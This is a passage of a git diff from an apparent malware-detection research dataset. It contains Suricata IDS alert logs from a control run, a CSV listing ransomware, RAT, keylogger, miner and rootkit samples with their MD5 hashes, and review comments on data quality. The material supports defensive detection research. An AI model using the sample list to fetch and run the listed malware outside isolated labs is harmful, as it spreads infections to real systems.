23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:52.844840 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:52.863110 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device 
Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49851 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.922","04/04/2020-14:14:48.752968 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.922","04/04/2020-14:14:48.782958 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49827 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.922","04/04/2020-14:14:48.940263 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.922","04/04/2020-14:14:48.978203 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49829 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.922","04/04/2020-14:14:49.160686 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.922","04/04/2020-14:14:49.175383 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49830 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.922","04/04/2020-14:14:49.327000 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] 
{TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.922","04/04/2020-14:14:49.421079 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49831 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.922","04/04/2020-14:14:49.595383 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.922","04/04/2020-14:14:49.625799 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49833 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.922","04/04/2020-14:14:49.796775 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.922","04/04/2020-14:14:49.901595 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49834 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.922","04/04/2020-14:14:50.122723 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.922","04/04/2020-14:14:50.200167 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49835 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 
14:14:52.922","04/04/2020-14:14:50.380725 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.922","04/04/2020-14:14:50.414522 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49836 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.922","04/04/2020-14:14:50.589496 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.922","04/04/2020-14:14:50.606530 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49837 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.921","04/04/2020-14:14:48.409470 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49825 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.921","04/04/2020-14:14:48.752968 [**] [1:2025275:3] ET INFO Windows OS Submitting USB Metadata to Microsoft [**] [Classification: Misc activity] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:08:28.719","04/04/2020-14:08:27.374959 [**] [1:2028371:2] ET JA3 Hash - Possible Malware - Fake Firefox Font Update [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49716 -> 52.114.88.29:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:04:33.699","04/04/2020-14:04:25.967688 [**] [1:2028371:2] ET JA3 Hash - Possible Malware - Fake Firefox Font Update 
[**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49693 -> 51.124.78.146:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:03:38.689","04/04/2020-14:03:36.114517 [**] [1:2028362:2] ET JA3 Hash - Possible Malware - Banking Phish [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49690 -> 51.124.78.146:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:03:38.689","04/04/2020-14:03:36.318741 [**] [1:2028362:2] ET JA3 Hash - Possible Malware - Banking Phish [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49692 -> 13.107.5.88:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:03:23.683","04/04/2020-14:03:17.919941 [**] [1:2028371:2] ET JA3 Hash - Possible Malware - Fake Firefox Font Update [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49684 -> 52.142.114.176:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:03:23.683","04/04/2020-14:03:18.030776 [**] [1:2028371:2] ET JA3 Hash - Possible Malware - Fake Firefox Font Update [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49685 -> 23.208.77.57:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:03:23.683","04/04/2020-14:03:20.045879 [**] [1:2028371:2] ET JA3 Hash - Possible Malware - Fake Firefox Font Update [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49686 -> 40.90.23.206:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:03:23.683","04/04/2020-14:03:20.046931 [**] [1:2028371:2] ET JA3 Hash - Possible Malware - Fake Firefox Font Update [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49687 -> 40.90.23.206:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:03:23.683","04/04/2020-14:03:22.989184 [**] [1:2028371:2] ET JA3 Hash - Possible Malware - Fake Firefox Font Update [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49688 -> 192.229.221.185:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:03:23.683","04/04/2020-14:03:22.989188 [**] 
[1:2028371:2] ET JA3 Hash - Possible Malware - Fake Firefox Font Update [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49689 -> 192.229.221.185:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:03:08.678","04/04/2020-14:03:08.238246 [**] [1:2028362:2] ET JA3 Hash - Possible Malware - Banking Phish [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49678 -> 13.107.136.254:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:03:08.678","04/04/2020-14:03:08.521793 [**] [1:2028362:2] ET JA3 Hash - Possible Malware - Banking Phish [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49679 -> 13.107.246.10:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:03:07.677","04/04/2020-14:03:02.690998 [**] [1:2028371:2] ET JA3 Hash - Possible Malware - Fake Firefox Font Update [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49673 -> 104.98.129.233:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:03:07.677","04/04/2020-14:03:06.117423 [**] [1:2028362:2] ET JA3 Hash - Possible Malware - Banking Phish [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49675 -> 204.79.197.200:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:03:07.677","04/04/2020-14:03:06.119289 [**] [1:2028362:2] ET JA3 Hash - Possible Malware - Banking Phish [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49674 -> 204.79.197.200:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:03:07.677","04/04/2020-14:03:07.437860 [**] [1:2028371:2] ET JA3 Hash - Possible Malware - Fake Firefox Font Update [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49676 -> 52.114.88.29:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:03:07.677","04/04/2020-14:03:07.620161 [**] [1:2028362:2] ET JA3 Hash - Possible Malware - Banking Phish [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49677 -> 204.79.197.200:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 
14:02:22.671","04/04/2020-14:02:20.328402 [**] [1:2028362:2] ET JA3 Hash - Possible Malware - Banking Phish [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49853 -> 65.52.7.224:443","/var/log/suricata/fast.log"
+"Apr 4, 2020 @ 14:02:22.671","04/04/2020-14:02:20.666217 [**] [1:2028362:2] ET JA3 Hash - Possible Malware - Banking Phish [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49854 -> 204.79.197.200:443","/var/log/suricata/fast.log"
diff --git a/data/short_overview.csv b/data/short_overview.csv
new file mode 100644
index 0000000..7d15b63
--- /dev/null
+++ b/data/short_overview.csv
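Review bot: Every alert in this export was raised during the run the file name labels NULLTEST, which presumably is the control run with no sample executed; if so, the four signatures present here (ET JA3 Hash - Possible Malware - Banking Phish, ET JA3 Hash - Possible Malware - Fake Firefox Font Update, ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent, ET INFO Windows OS Submitting USB Metadata to Microsoft) are baseline noise from the host 172.16.2.2 itself, and the commit does not say how they are subtracted before a sample run is scored as detected by the NIDS. The JA3 "Possible Malware" rules key on the client TLS fingerprint alone and fire here on the control host's own connections, so they are likely to reappear in every sample run regardless of the sample. A one-line description next to the file, e.g. `NULLTEST_NIDS.csv: Suricata fast.log alerts observed in the control run (no sample); SIDs 2028362, 2028371, 2027390 and 2025275 are baseline and must be excluded when scoring a sample run`, would make that subtraction reproducible. Note also that the Kibana `@timestamp` lags the Suricata timestamp inside the message by several seconds (first row: 14:17:21.957 versus 14:17:15.892884) and the rows are in reverse chronological order, so the in-message timestamp, not `@timestamp`, is the one to correlate against host events.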
@@ -0,0 +1,39 @@
+ID,Category,Sample_Name,Sample_Type,Sample_MD5
+1,Cryptominer,Generic.Application.CoinMiner,"Win32 EXE
+",c22908fe460312d76b50129aa3ef2cf2
+2,Backdoor,Win32:Malware-gen,"Win32 EXE
+",e6a132e279806cc95684dc2bd67a0da0
+3,Backdoor,Trojan-Banker.Agent,"Win32 EXE
+",aa52c9a86073b75748ec6c98eca17dab
+4,Backdoor,Trojan.DCRAT,Win32 EXE,1e2611836860d60a2a6b4c560ef74650
+5,Backdoor,Trojan.Qbot,VBS,1c347009d6fce779bca8385395f26f94
+6,Backdoor,Trojan.Agent.Zenpak,"Win32 EXE
+",fbe6d341c1b69975be74616d01c6d273
+7,Backdoor,Shadowhammer,application/x-rar,c09e41b3eb42eb79853de5bd1f5a5830
+8,Backdoor,Backdoor.AsyncRAT,"Win32 EXE
+",9f16a651f918972eee7be4f19d40bb91
+9,Backdoor,"Backdoor.Bladabindi
+",Win32 EXE,c2c057d9645af7f64e9d11672840828e
+10,Spyware,TrojanSpy.Win32,Win32 EXE,19b11aa448409adc15c93e1fdd3c6774
+11,Spyware,Trojan.Spyware,Win32 EXE,40c0304b144736668ca2a0217d296c37
+12,Spyware,HTML.SpyAgent,html,3b926d275ef56bb063d1e37042f211a3
+13,Spyware,Keylogger.HawkEye,Win32 EXE,8d897a409a231c4bdb21ac3bcf9118b1
+14,Spyware,Spyware.PasswordStealer,Win32 EXE,69ad26a3aae3e2950e5a93ccc0cd1859
+15,Spyware,Trojan.GenKryptik,Win32 EXE,9530e5c9e8591d5025e11a20f604520b
+16,Ransomware,Ransom.Cryakl,Win32 EXE,23a8bfb5bdbff2f294506019cf2f425f
+17,Ransomware,Ramsom.Balaclav,Win32 EXE,7ed4882c2a0d24c401cbce7536ddf792
+18,Ransomware,Ransom.Ryuk,Win32 EXE,3f5da05d62a70eb1212db39d5d6cf45e
+19,Ransomware,Trojan.DOCX,DOCX,1a26c9b6ba40e4e3c3dce12de266ae10
+20,Spyware,Trojan.Lucifer,Win32 EXE,66a3124fe4ed45fae20e2bd4ee33c626
+21,Adware,Adware.Linkvertise,Win32 EXE,25fcd5a2cc5590630ab8d971e82b70cb
+22,Rootkit,Rootkit.Bandios,Win32 EXE,4b042bfd9c11ab6a3fb78fa5c34f55d0
+23,Ransomware,Ransom.GandCrab,Win32 EXE,d543a6c58e8e92d0b2f33abb270a4c3d
+24,Cryptominer,Miner.XMRig,Win32 EXE,5616a3471565d34d779b5b3d0520bb70
+25,Cryptominer,Miner.lemon_duck,ps1,28b80843b13fab0986479b54310c8053
+26,Cryptominer,Trojan.Glupteba.Qwertyminer,Win32 EXE,d668e0990354d0ae209ec520cb80e052
+27,Cryptominer,Miner.Tofsee,Win32 EXE,488bfb786944d1b236ac6254eb97dd69
+28,Rootkit,Rootkit.Lamberts,Win32 EXE,a00918f782ba83aa405614430c65aab6
+29,Adware,Adware.Mindspark,Win32 EXE,aeb471c20095e7d8557478a518d0fc8c
+30,Adware,Adware.Sogou,Win32 EXE,775307b867b19872f49aaa9fcc7c6800
+31,Adware,Adware.FusionCore,Win32 EXE,d4ce88978ea01afe4ec930e59f9abf61
+32,Adware,Adware.Unruy,Win32 EXE,3a4c09aba1b399a43a65a27aee9c90e0
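Review bot: Six records carry a quoted field that ends in a newline — Sample_Type on IDs 1, 2, 3, 6 and 8 is `"Win32 EXE` followed by a line break and `"`, and Sample_Name on ID 9 is `"Backdoor.Bladabindi` split the same way — so any filter or group-by on Sample_Type == "Win32 EXE" silently drops those rows and a reader that does not handle multi-line quoted fields mis-parses the file; trimming the stray newline, e.g. `1,Cryptominer,Generic.Application.CoinMiner,Win32 EXE,c22908fe460312d76b50129aa3ef2cf2`, fixes it. Sample_Type values are also inconsistent in form (`Win32 EXE`, `VBS`, `html`, `DOCX`, `ps1`, `application/x-rar`), which will bite the same grouping. Each sample is identified by MD5 only; MD5 is not collision-resistant, so it should not be the sole identifier of a malware sample, and adding a Sample_SHA256 column is the safer reference for anyone re-acquiring the set. `Ramsom.Balaclav` on ID 17 looks like a typo for `Ransom`, though if the name was copied verbatim from the source's label it should stay as the source has it.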